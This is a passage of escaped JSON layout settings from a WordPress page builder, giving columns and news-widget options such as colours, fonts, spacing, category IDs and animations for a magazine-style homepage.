\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"27.961\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"12\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"11\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"44.078\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"400\",\"height\":\"510\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"27.960\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"